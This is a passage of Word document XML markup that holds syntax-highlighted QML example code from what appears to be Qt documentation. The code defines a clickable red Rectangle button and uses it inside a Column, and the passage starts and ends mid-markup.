          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</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2.0</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    width</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100</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height</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100</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MouseArea</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        anchors</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fill</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parent</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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        onClicked</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console</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log</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"Button clicked!"</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="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pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="00E21B6D">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D" w:rsidP="00E21B6D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Button</w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E21B6D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type can then be used in an application:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="1429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0668"/>
        <w:gridCol w:w="3627"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidTr="00E21B6D">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E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="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com"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="55FFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>// application.qml</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="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kwd"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>import</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QtQuick</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2.0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="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E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="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typ"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Column</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="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pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Button</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </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width</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50</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height</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50</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B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1B6D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Button</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </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x</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50</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width</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100</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height</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lit"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>50</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color</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="str"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"blue"</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E21B6D" w:rsidRPr="00E21B6D" w:rsidRDefault="00E21B6D">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Button</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> width</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="lit"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> height</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="lit"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>50</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> radius</w:t>
            </w:r>
            <w:r w:rsidRPr="00E21B6D">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
